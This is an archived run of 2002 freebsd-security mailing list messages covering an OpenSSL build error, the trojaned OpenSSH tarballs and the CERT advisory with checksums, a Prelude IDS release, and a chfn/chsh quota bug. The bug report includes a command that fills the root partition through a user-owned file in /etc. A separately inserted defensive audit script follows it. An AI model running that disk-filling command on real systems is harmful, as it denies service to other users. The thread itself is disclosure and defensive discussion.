some processing every day, week, or month while the maintainers have either
left or moved on and no one really notices it is there but would seriously
"miss" it should it be disturbed in some way. (Note that lack of maintenance
doesn't imply that the system wasn't set up or designed for this eventuality).
This means that getting rid of protocol 1 completely really wouldn't "increase"
the number of secure systems from a statistical standpoint.

3. We aren't OpenBSD. Our target audience is somewhat different. We wish to
deliver an enterprise level operating solution for free. That is all we claim
to do. We aren't trying to set any records (regarding security or otherwise).
Making other people's lives harder for the sake of some hypothetical gains
isn't good customer service or marketing. Migrate to OpenBSD if you want that
sort of thing (and post your wishes on their mailing lists instead of here).

> > 1b: -- used as a function word to express the negative of an alternative
> > choice or possibility
> > 2: in no respect or degree -- used in comparisons
> > 3: not so -- used to express negation, dissent, denial, or refusal
>
> How do you dissent?
>
> > 4: -- used with a following adjective to imply a meaning expressed by the
> > opposite positive statement <~ uncertain terms>
> > 5: -- used as a function word to emphasize a following negative or to
> > introduce a more emphatic, explicit, or comprehensive statement
> > 6: -- used as an interjection to express surprise, doubt, or incredulity
> --
> Trevor Johnson

--
Peter C. Lai
University of Connecticut
Dept. of Molecular and Cell Biology | Undergraduate Research Assistant
Yale University School of Medicine
SenseLab | Center for Medical Informatics | Research Assistant
http://cowbert.2y.net/

From: "Reuben A. Popp"
Reply-To: gobinau@digitalcelt.com
To: security@freebsd.org
Date: Thu, 1 Aug 2002 12:04:45 -0500
Subject: openssl build

Hi all,

	I've run into a small conundrum while building the recent port of openssl
(openssl-0.9.6e). It appears that the build works fine, except to the point
where it begins to install the man pages. The following is my error snippet.
This box is running 4.6-STABLE if that helps any. And now, the snippet:

making all in apps...
making all in test...
making all in tools...
created directory `/usr/openssl'
created directory `/usr/openssl/man'
created directory `/usr/openssl/man/man1'
created directory `/usr/openssl/man/man3'
created directory `/usr/openssl/man/man5'
created directory `/usr/openssl/man/man7'
installing man1/CA.pl.1
/usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking for
another pod2man ...
Can't locate Pod/Man.pm in @INC (@INC contains:
/usr/local/lib/perl5/site_perl/5.005/i386-freebsd
/usr/local/lib/perl5/site_perl/5.005 . /usr/libdata/perl/5.00503/mach
/usr/libdata/perl/5.00503) at /usr/local/bin/pod2man line 16.
BEGIN failed--compilation aborted at /usr/local/bin/pod2man line 16.
*** Error code 2

Stop in /usr/ports/security/openssl/work/openssl-0.9.6e.
*** Error code 1

Stop in /usr/ports/security/openssl.
[gobinau@www (/usr/ports/security/openssl)] (10:32:56)#

Thanks in advance for any insight/suggestions :D

..
With threats of gas and rose motif
Their lips apart like a swollen rose
Their tongues extend, and then retract
A redcap, a redcap, before the kiss, before the kiss.
..
From: Christopher Schulte
To: gobinau@digitalcelt.com, security@freebsd.org
Date: Thu, 01 Aug 2002 12:11:54 -0500
Subject: Re: openssl build

At 12:04 PM 8/1/2002 -0500, Reuben A. Popp wrote:
>/usr/bin/pod2man does not work properly ('MultilineTest' failed). Looking
>for
>another pod2man ...
>Can't locate Pod/Man.pm in @INC (@INC contains:

Are you using /usr/local/bin/pod2man (maybe from a perl5.6 install?) versus
/usr/bin/pod2man? If so, give /usr/bin/pod2man a whirl.

--
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org email address.
This address is valid.

From: Christopher Schulte
To: gobinau@digitalcelt.com, security@freebsd.org
Date: Thu, 01 Aug 2002 12:22:27 -0500
Subject: Re: openssl build

At 12:11 PM 8/1/2002 -0500, Christopher Schulte wrote:
>Are you using /usr/local/bin/pod2man (maybe from a perl5.6 install?) versus
>/usr/bin/pod2man? If so, give /usr/bin/pod2man a whirl.

More accurately, remove /usr/local/bin/pod2man from your path. This will
force a 'workaround' and the install will continue.

(sorry for followup, my original message was not clear enough)

--
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org email address.
This address is valid.

From: "Duncan Patton a Campbell is Dhu"
To: Holt Grendal, security@FreeBSD.ORG
Date: Thu, 1 Aug 2002 12:00:25 -0600
Subject: Re: How was ftp.openbsd.org compromised?

Ah yes, the Politics of Security rears its head.
From the looks of it, this "trojan" was meant to be found: far too clumsy and
obvious to be otherwise. Why? One can only speculate, but I'd hazard a guess
that someone with access to the U of A's sunsite has a vested interest in
defaming Open Source systems and software. So, who has lately claimed that
Open Source is Evil and Anti-Capitalist? Nahh, couldn't be. That would mean
bribes and blackmail. Mebbe the problem is that info really isn't Capital at
all, and the bluff might be called.

Duncan Patton a Campbell is Duibh ;-)

---------- Original Message -----------
From: Holt Grendal
To: security@FreeBSD.ORG
Sent: Thu, 1 Aug 2002 08:46:03 -0700 (PDT)
Subject: How was ftp.openbsd.org compromised?

> How was ftp.openbsd.org compromised?
>
> Anything we need to worry about?
------- End of Original Message -------

From: Radko Keves
To: freebsd-security@freebsd.org
Cc: freebsd-current@freebsd.org
Date: Thu, 1 Aug 2002 21:34:48 +0200
Subject: possible bug in chsh chfn

Description:

unauthorized write access to /etc directory using chfn/chsh commands in
FreeBSD 5.0-CURRENT.

Contributing factors:

In FreeBSD 5.0, it is possible to fill up the whole partition by using the
chfn/chsh commands. Normally, users have quotas set up on directories that
they are allowed to write to, e.g. home directory, /tmp, /var/tmp, etc.
Let's say a user has quotas set up this way:

% quota -u rado
Disk quotas for user rado (uid 1001):
     Filesystem   usage   quota   limit   grace   files   quota   limit   grace
          /home   66760  500000  550000            3481       0       0
           /tmp  135193  260000  280000            5417       0       0
...

There's normally no need to set up quotas for other partitions (such as /,
/usr, ...) because ordinary users have no permission to write/change the
files in those directories, e.g. in / or /etc.

Symptoms:

Our experience with the chsh/chfn commands shows that when a user changes
his/her finger information/shell, these commands invoke the vi editor with a
temporary file stored in /tmp. Imagine that a user's quota exceeded his/her
limit for /tmp. Our ordinary user did this by filling up the /tmp partition
with many large files. The chfn/chsh commands then stored their temporary
files in the /etc directory with the given user's permissions, e.g.:

% id happy
uid=2006(happy) gid=58(st1999) groups=58(st1999)
% quota -u happy
...
           /tmp  21995*   20000   22000   7days       6       0       0
...
(We can see that the disk quota was exceeded in /tmp for user happy)
% ls -ld /etc
drwxr-xr-x  20 root  wheel  22016 Aug  1 19:22 /etc
% ls -l /etc | grep happy
-rw-------  1 happy  st1999  157278362 Aug  1 19:19 pw.BEMwxq
-rw-------  1 happy  st1999        154 Aug  1 19:22 pw.KxGCF3
-rw-------  1 happy  st1999  157278362 Aug  1 19:19 pw.iW7Pmt
-rw-------  1 happy  st1999  157278362 Aug  1 19:20 pw.rhJq0s
-rw-------  1 happy  st1999  157278374 Aug  1 19:16 pw.tpPLK4

Now it is possible for such a user to fill up the root partition without
having a permission set on /, e.g. with

% cat /dev/zero >> /etc/pw.KxGCF3

Workaround:

Our workaround is to either set up quotas for the root partition or disable
the chsh/chfn commands.

Important Notices:

1. The chpass, ypchpass, ypchfn, and ypchsh commands seem to be affected by
the symptoms described above as well, because they are just hard links... :)

2. When experimenting with the chpass command, it caused a segmentation fault
when used with the -a argument because of a NULL pointer comparison in
chpass.c, line 169 (no getpw* (3) library call invoked!!!):

	if ((pw->pw_fields & _PWF_SOURCE) == _PWF_NIS)

% id happy
uid=2006(happy) gid=58(st1999) groups=58(st1999)
% chpass -a qqqqq
Segmentation fault

chpass doesn't seem to be locally exploitable. Some changes to the source
code are needed for normal operation.

Credits:

pali@unitra.sk
happy@unitra.sk
rado@studnet.sk

--
--------------
bye
R.R.K.K.
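An added audit for the symptom reported above, written here and not part of the bug report: it scans an `ls -l` listing of /etc for the pw.XXXXXX temporary files that chfn/chsh leave behind when /tmp is over quota, flags any not owned by root, and totals the space they hold. It assumes a POSIX sh with awk and the nine-column `ls -l` layout shown in the report; SAMPLE_LISTING is constructed from the report's output for user "happy".

```shell
#!/bin/sh
# Added example (not from the bug report or FreeBSD): detect chpass-family
# temporary files stranded in /etc under an unprivileged owner.
# Assumes POSIX sh + awk and the `ls -l` column layout used in the report:
#   mode links owner group size month day time name

# Read `ls -l` lines on stdin; print "owner size name" for each pw.* entry
# whose owner is not root. Root-owned pw.* files are legitimate in-flight
# pwd_mkdb work and are skipped.
stray_pw_entries() {
    awk '$NF ~ /^pw\./ && $3 != "root" { print $3, $5, $NF }'
}

# Sum the sizes of the stray entries, to gauge how much of the root
# partition has already been consumed.
stray_pw_bytes() {
    stray_pw_entries | awk '{ s += $2 } END { print s + 0 }'
}

# Audit a live directory (default /etc). Exit status 1 when stray files exist,
# so the function can be wired into a periodic check.
audit_etc() {
    dir=${1:-/etc}
    found=$(ls -l "$dir" 2>/dev/null | stray_pw_entries)
    if [ -n "$found" ]; then
        printf 'stray chpass temp files in %s:\n%s\n' "$dir" "$found"
        return 1
    fi
    return 0
}

# Constructed sample listing, modelled on the report's `ls -l /etc` output.
SAMPLE_LISTING='drwxr-xr-x  2 root   wheel         512 Aug  1 19:22 ssh
-rw-------  1 happy  st1999  157278362 Aug  1 19:19 pw.BEMwxq
-rw-------  1 happy  st1999        154 Aug  1 19:22 pw.KxGCF3
-rw-r--r--  1 root   wheel        1234 Aug  1 19:00 pw.tmpok
-rw-r--r--  1 root   wheel        3456 Aug  1 19:00 passwd'
```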
From: Joshua Lee
To: Artur Lindgren
Cc: freebsd-security@FreeBSD.ORG
Date: Thu, 1 Aug 2002 19:37:39 -0400
Subject: Re: Trojan located in latest openssh tar files

On Thu, 1 Aug 2002 14:11:24 +0200 Artur Lindgren wrote:
> I noticed that openssh-3.4p has a trojan horse (available from
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> and some of the mirrors.

Is this a problem for someone who makes world with FreeBSD and gets OpenSSH
from the source tree or only for people who get OpenSSH via ports?

From: "DiCioccio, Jason"
To: 'Joshua Lee', Artur Lindgren
Cc: freebsd-security@FreeBSD.ORG
Date: Thu, 1 Aug 2002 16:58:14 -0700
Subject: RE: Trojan located in latest openssh tar files

Neither -- unless you tell it to ignore the checksum on the port. As far as
the source tree, OpenSSH 3.4 was imported a while back, so I don't think the
same problem would exist as the trojan seemed to originate yesterday.

Cheers,
-JD-

-----Original Message-----
From: Joshua Lee [mailto:yid@softhome.net]
Sent: Thursday, August 01, 2002 4:38 PM
To: Artur Lindgren
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Trojan located in latest openssh tar files

On Thu, 1 Aug 2002 14:11:24 +0200 Artur Lindgren wrote:
> I noticed that openssh-3.4p has a trojan horse (available from
> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> and some of the mirrors.

Is this a problem for someone who makes world with FreeBSD and gets OpenSSH
from the source tree or only for people who get OpenSSH via ports?

From: Peter Leftwich
To: Artur Lindgren
Cc: FreeBSD Security LIST
Date: Thu, 1 Aug 2002 19:59:08 -0400 (EDT)
Subject: Re: Trojan located in latest openssh tar files

On Thu, 1 Aug 2002, Joshua Lee wrote:
> On Thu, 1 Aug 2002 14:11:24 +0200 Artur Lindgren wrote:
> > I noticed that openssh-3.4p has a trojan horse (available from
> > ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> > and some of the mirrors.
> Is this a problem for someone who makes world with FreeBSD and gets OpenSSH
> from the source tree or only for people who get OpenSSH via ports?

Can you be more specific about your discovery please?

--
Peter Leftwich
President & Founder
Video2Video Services
Box 13692, La Jolla, CA, 92039 USA
+1-413-403-9555

From: Yoann Vandoorselaere
To: prelude-user@prelude-ids.org
Cc: prelude-devel@prelude-ids.org
Date: 01 Aug 2002 20:01:57 +0200
Subject: [ANNOUNCEMENT]: Prelude Hybrid IDS suite 0.8.0 released

Prelude... before the tempest.
======[ Prelude Hybrid IDS suite 0.8.0 released ]====== The Prelude team is pleased to announce the public release of version 0.8.0 of the Prelude Hybrid Intrusion Detection System. ------[ What is Prelude IDS ? ]------ Prelude is a new innovative hybrid intrusion detection system designed to be very modular, distributed, rock solid and fast. Prelude was started in 1998 as a network intrusion detection system, coded entirely from scratch. Recently the project has evolved towards a fully hybrid intrusion detection system, integrating both network- and host-based intrusion detection techniques. Currently the main development platforms are Linux and FreeBSD on x86. It was also tested on Linux on PPC, Alpha, IA-64 (Itanium) and Sparc hardware platforms. It should also work with other *BSD systems. Prelude is licensed under the terms of the GNU General Public License version 2. The Prelude website is located at http://www.prelude-ids.org/ ------[ What's new since 0.4.2 ? ]------ Hybrid means that Prelude now acts as both a network IDS and as a host-based IDS. To achieve this goal components have been split and reorganized to give an even more modular and distributed design. The new components scheme is described in the Documentation section of the Prelude website. The new Prelude release as well as the release notes are available from the Download page. Description of changes since version 0.4.2 is given below for each module. Watch out, here we come. ------[ Prelude IDS 0.8.0 components ]------ *** Libprelude * Description: Prelude Library is a collection of generic functions providing communication between the Prelude Hybrid IDS suite's components.
It provides a convenient interface for sending alerts to Prelude Manager with transparent SSL, fail over and replication support, asynchronous events and timer interfaces, abstracted configuration API (hooking at command line, configuration line or wide configuration, available from the Manager) and generic plugin API. By using libprelude, you can easily turn your favorite security program into a Prelude sensor. * Changes since last version: Initial release. Work has been done towards good portability and sharing of functionality between Prelude Sensors. *** Prelude NIDS * Description: Prelude NIDS is the network-based sensor program part of the Prelude Hybrid IDS suite. It provides network monitoring along with fast pattern matching (Boyer-Moore only currently) in order to detect attacks against your network. It includes advanced mechanisms such as a generic signature engine which is able to understand any ruleset as long as there is a dedicated parser (Snort only currently); protocol and detection analysis plugins featuring Telnet, RPC, HTTP and FTP decoding and preprocessors for cross-platform polymorphic shellcode detection, ARP misuse detection and scanning detection. It completely supports IP fragmentation and TCP segmentation to track connections and detect stateful events. * Changes since last version: TCP stream reassembly (proof against fragroute and stick/snot attacks); HTTP IIS unicode and UTF8 support; Polymorphic shellcode detection; TCP/IP checksums; Support latest Snort ruleset; Handles rule rev, content-list, and sid; IDMEF Alert carries more information about the analyzer, alert severity, etc; IDMEF Heartbeat support; Promiscuous mode can be disabled; Proper implementation of the pcap zero copy patch; Avoid polling the captured device when possible; Capture from Linux cooked devices; Ported to *BSD systems, corrected handling of memory alignment and endianness issues (works gracefully on non x86 architectures).
*** Prelude Manager * Description: Prelude Manager is the main program of the Prelude Hybrid IDS suite. It is a multithreaded server handling connections from the different sensors. It is able to register local or remote sensors, let the operator configure them remotely, receive alerts, store alerts in a database or any format supported by reporting plugins (MySQL, PostgreSQL and simple text plugins currently), thus providing centralized logging and analysis. It also provides relaying capabilities for fail-over and replication. The IDMEF standard is used for alert representation. Support for filtering plugins allows you to hook in different places of the Manager to define custom criteria for alert relaying and logging. * Changes since last version: Previously known as Prelude Report Server; High performance sensors server; Thread safe SSL support; support for PostgreSQL and MySQL databases; support for filtering plugins; relaying between managers; IDMEF compatibility; Ported to *BSD systems, corrected handling of memory alignment and endianness issues (works gracefully on non x86 architectures). *** Prelude LML * Description: Prelude LML (Log Monitoring Lackey) is the host-based sensor program that is part of the Prelude Hybrid IDS suite. It can act as a centralized log collector for local or remote systems, or as a simple log analyzer (such as swatch). It can run as a network server listening on the syslog port or analyze log files. It supports logfiles in the BSD syslog format and is able to analyze any logfile by using the powerful PCRE library. It can also apply logfile-specific analysis through plugins such as PaX. The current signature ruleset supports FreeBSD's IPFW logs, Linux 2.4's NetFilter logs, Cisco and Zyxel routers' logs, GrSecurity's logs, PaX's logs and common unix logfiles. Finally, it sends an alert to the Prelude Manager when a suspicious log entry is detected. * Changes since last version: Initial release.
*** Prelude PHP Frontend * Description: Prelude PHP Frontend is a web-based administrative console for the Prelude Hybrid IDS suite. It is a collection of PHP scripts based on Apache with mod_php, and with the AdoDB and PHPlot libraries. It can access alerts stored in the database using standard SQL requests locally or remotely. Then you can visualize IDMEF alerts and generate charts and statistics. The frontend also provides simple manual forensic analysis and correlation capabilities by using visualization filters. * Changes since last version: Initial release. ------[ Getting the release ]------ Prelude IDS 0.8.0 can be downloaded from our website: http://www.prelude-ids.org/index.php?page=12 *** Release files MD5 sums 5295bdd47350cc52a9ff2bd8224a6c3d libprelude-0.8.0.tar.gz 9a37078364e35622ee6378e5efeb870a prelude-lml-0.8.0.tar.gz a4d96266d058d88c47eb539c20004b0f prelude-manager-0.8.0.tar.gz 29763787d403bfd380048b2c82402272 prelude-nids-0.8.0.tar.gz 9ed057651102146e5de36c990474eeff prelude-php-frontend-0.8.0.tar.gz ------[ Credits for this release ]------ * Yoann Vandoorselaere (Main developer / project author - Prelude-NIDS, Prelude-Manager, Prelude-LML, Libprelude) * Gilles Seguin (Prelude PHP Frontend) * Vincent Geay (Prelude PHP Frontend) * Alexandre Launay (Prelude-LML : Prelude Log Monitoring Lackey) * Pierre-Jean Turpeau (Prelude-LML : Prelude Log Monitoring Lackey) * Krzysztof Zaraska (FreeBSD port, bugfixes, Manager debugging plugin) * Sylvain Gil (Makefile / Autoconf subsystem work, Database plugins support) * Laurent Oudot (Tcp Window key support, Database IDMEF support, frontend work) * Vincent Glaume (TCP stream reassembly work, TCP/IP checksum, bugfixes) * Baptiste Malguy (bugfixes, flex work, db work, counter measure work) * Arnaud Guignard (Prelude-LML signature engine work) * Philippe Biondi (Libqsearch implementation) ------[ Contributors ]------ * Yann Droneaud (Autoconf/Automake work, Prelude beta testing and debugging) * Sebastien Tricaud
(Prelude FAQ) * Daniel Polombo (Prelude HOWTO, Installation help) * Michael Samuel (Prelude LML conceptual work) ------[ Artwork ]------ * Marchand Thierry (official Prelude artist, logo conceptor) * Odile Darmet (Website) -- Yoann Vandoorselaere http://www.prelude-ids.org --=-9qMsoUyut8ZSD3PB4cKn Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQA9SXeV4tfUv0C+vv8RAmOtAJ43zLqTbe+bDO7goE1NhZbDS1wryACdEpGZ iKFr4tUoWSAKGemHofU35PY= =Vb3B -----END PGP SIGNATURE----- --=-9qMsoUyut8ZSD3PB4cKn-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18: 0: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 502D837B400; Thu, 1 Aug 2002 17:59:58 -0700 (PDT) Received: from mx.netgate.net (mx.netgate.net [204.145.147.77]) by mx1.FreeBSD.org (Postfix) with ESMTP id E68A143E70; Thu, 1 Aug 2002 17:59:57 -0700 (PDT) (envelope-from ctodd@netgate.net) Received: from rs.netgate.net (rs.netgate.net [204.145.147.55]) by mx.netgate.net (8.9.3/8.9.3) with ESMTP id RAA02569; Thu, 1 Aug 2002 17:59:57 -0700 (PDT) Date: Thu, 1 Aug 2002 17:59:57 -0700 (PDT) From: Chris Miller To: dinoex@FreeBSD.org Cc: freebsd-security@FreeBSD.org Subject: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Are we affected by this? I couldn't find bf-test.c in the openssh directory in /usr/ports.
I'm assuming that since the part of the automagic process of building the port involves checking the checksum that we are safe, but I thought it best to ask. Regards, Chris ---------- Forwarded message ---------- Date: Thu, 1 Aug 2002 17:13:46 -0400 From: CERT Advisory To: cert-advisory@cert.org Subject: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution Original issue date: August 1, 2002 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Overview The CERT/CC has received confirmation that some copies of the source code for the OpenSSH package were modified by an intruder and contain a Trojan horse. We strongly encourage sites which employ, redistribute, or mirror the OpenSSH package to immediately verify the integrity of their distribution. I. Description The CERT/CC has received confirmation that some copies of the source code for the OpenSSH package have been modified by an intruder and contain a Trojan horse. The following advisory has been released by the OpenSSH development team http://www.openssh.com/txt/trojan.adv The following files were modified to include the malicious code: openssh-3.4p1.tar.gz openssh-3.4.tgz openssh-3.2.2p1.tar.gz These files appear to have been placed on the FTP server which hosts ftp.openssh.com and ftp.openbsd.org on the 30th or 31st of July, 2002. The OpenSSH development team replaced the Trojan horse copies with the original, uncompromised versions at 13:00 UTC, August 1st, 2002. The Trojan horse copy of the source code was available long enough for copies to propagate to sites that mirror the OpenSSH site. The Trojan horse versions of OpenSSH contain malicious code that is run when the software is compiled. This code connects to a fixed remote server on 6667/tcp. It can then open a shell running as the user who compiled OpenSSH. II. 
Impact An intruder operating from (or able to impersonate) the remote address specified in the malicious code can gain unauthorized remote access to any host which compiled a version of OpenSSH from this Trojan horse version of the source code. The level of access would be that of the user who compiled the source code. III. Solution We encourage sites who downloaded a copy of the OpenSSH distribution to verify the authenticity of their distribution, regardless of where it was obtained. Furthermore, we encourage users to inspect any and all software that may have been downloaded from the compromised site. Note that it is not sufficient to rely on the timestamps or sizes of the file when trying to determine whether or not you have a copy of the Trojan horse version. Where to get OpenSSH The primary distribution site for OpenSSH is http://www.openssh.com/ Sites that mirror the OpenSSH source code are encouraged to verify the integrity of their sources. Verify MD5 checksums You can use the following MD5 checksums to verify the integrity of your OpenSSH source code distribution: Correct versions: 459c1d0262e939d6432f193c7a4ba8a8 openssh-3.4p1.tar.gz d5a956263287e7fd261528bb1962f24c openssh-3.4p1.tar.gz.sig 39659226ff5b0d16d0290b21f67c46f2 openssh-3.4.tgz 9d3e1e31e8d6cdbfa3036cb183aa4a01 openssh-3.2.2p1.tar.gz be4f9ed8da1735efd770dc8fa2bb808a openssh-3.2.2p1.tar.gz.sig At least one version of the modified Trojan horse distributions was reported to have the following checksum: Trojan horse version: 3ac9bc346d736b4a51d676faa2a08a57 openssh-3.4p1.tar.gz Verify PGP signature Additionally, distributions of the portable release of OpenSSH are distributed with detached PGP signatures. Note that the Trojan horse versions were not signed correctly, and attempts to verify the signatures would have failed. As a matter of good security practice, the CERT/CC encourages users to verify, whenever possible, the integrity of downloaded software. 
For more information, see http://www.cert.org/incident_notes/IN-2001-06.html Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Connectiva Linux Conectiva Linux distributes openssh-3.4p1 as a security update. The distributed copy is the original one and is not affected by this trojan. The detached digital signature is always checked before building third party packages. MandrakeSoft MandrakeSoft has verified that the openssh-3.4p1 sources used to build its latest updates (ref. MDKSA-2002:040-1) do not contain this trojan. _________________________________________________________________ _________________________________________________________________ Feedback can be directed to the author: Chad Dougherty. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-24.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information.
Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. 
Revision History August 1, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPUmR3qCVPMXQI2HJAQFs7wP/SwypiZbfCb/FvMBgE3rFaY9Ul7vlyRKE KPncunJ+KVp2sBzTbNL01wOuASx836hTa/ByXwnX4LQLX0XzBLrDcVsrDlu1pUga Z/CopXb3KclKckmti5diCz1BNQdKbYyu/G7uHkjZQPJKC6UZr9lmge+00HMqSmHN AAOV7PQstAc= =FgfD -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18: 2:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 92D3337B400; Thu, 1 Aug 2002 18:02:33 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2337E43E5E; Thu, 1 Aug 2002 18:02:33 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id C1D37535E; Fri, 2 Aug 2002 03:02:29 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Chris Miller Cc: dinoex@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: CERT Advisory CA-2002-24 Trojan Horse OpenSSH Distribution (fwd) References: From: Dag-Erling Smorgrav Date: 02 Aug 2002 03:02:28 +0200 In-Reply-To: Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Chris Miller writes: > Are we affected by this? I couldn't find bf-test.c in the openssh > directory in /usr/ports. 
I'm assuming that since the part of the automagic > process of building the port involves checking the checksum that we are > safe, but I thought it best to ask. We're safe. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18: 7:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1434A37B400 for ; Thu, 1 Aug 2002 18:07:34 -0700 (PDT) Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by mx1.FreeBSD.org (Postfix) with SMTP id 6567143E4A for ; Thu, 1 Aug 2002 18:07:33 -0700 (PDT) (envelope-from yid@softhome.net) Received: (qmail 28943 invoked by uid 417); 2 Aug 2002 01:07:28 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 2 Aug 2002 01:07:28 -0000 Received: from unknown ([216.194.6.221]) (AUTH: LOGIN yid@softhome.net) by softhome.net with esmtp; Thu, 01 Aug 2002 19:07:25 -0600 Date: Thu, 1 Aug 2002 21:05:56 -0400 From: Joshua Lee To: "DiCioccio, Jason" Cc: bond@comitnet.se, freebsd-security@FreeBSD.ORG Subject: Re: Trojan located in latest openssh tar files Message-Id: <20020801210556.04b0fee1.yid@softhome.net> In-Reply-To: <657B20E93E93D4118F9700D0B73CE3EA02FFF649@goofy.epylon.lan> References: <657B20E93E93D4118F9700D0B73CE3EA02FFF649@goofy.epylon.lan> Organization: Plan B Software Labs X-Mailer: Sylpheed version 0.8.0claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002 16:58:14 -0700 "DiCioccio, Jason" wrote: > Neither -- unless you tell it to ignore the checksum 
on the port. As > far as the source tree, OpenSSH 3.4 was imported a while back, so I > don't think the same problem would exist as the trojan seemed to > originate yesterday. Yes, and come to think of it, since it requires the cooperation of a makefile, unless the source tree uses the makefile of the original package there's no hole for the source tree's openssh. Thanks for the help. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 18:12:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 695FD37B400 for ; Thu, 1 Aug 2002 18:12:34 -0700 (PDT) Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6E83A43E7B for ; Thu, 1 Aug 2002 18:12:33 -0700 (PDT) (envelope-from ache@pobrecita.freebsd.ru) Received: from pobrecita.freebsd.ru (ache@localhost [127.0.0.1]) by nagual.pp.ru (8.12.5/8.12.5) with ESMTP id g721CSDG006483 for ; Fri, 2 Aug 2002 05:12:30 +0400 (MSD) (envelope-from ache@pobrecita.freebsd.ru) Received: (from ache@localhost) by pobrecita.freebsd.ru (8.12.5/8.12.5/Submit) id g721CRAJ006482 for security@freebsd.org; Fri, 2 Aug 2002 05:12:27 +0400 (MSD) (envelope-from ache) Date: Fri, 2 Aug 2002 05:12:26 +0400 From: "Andrey A. Chernov" To: security@freebsd.org Subject: [ache@FreeBSD.org: cvs commit: 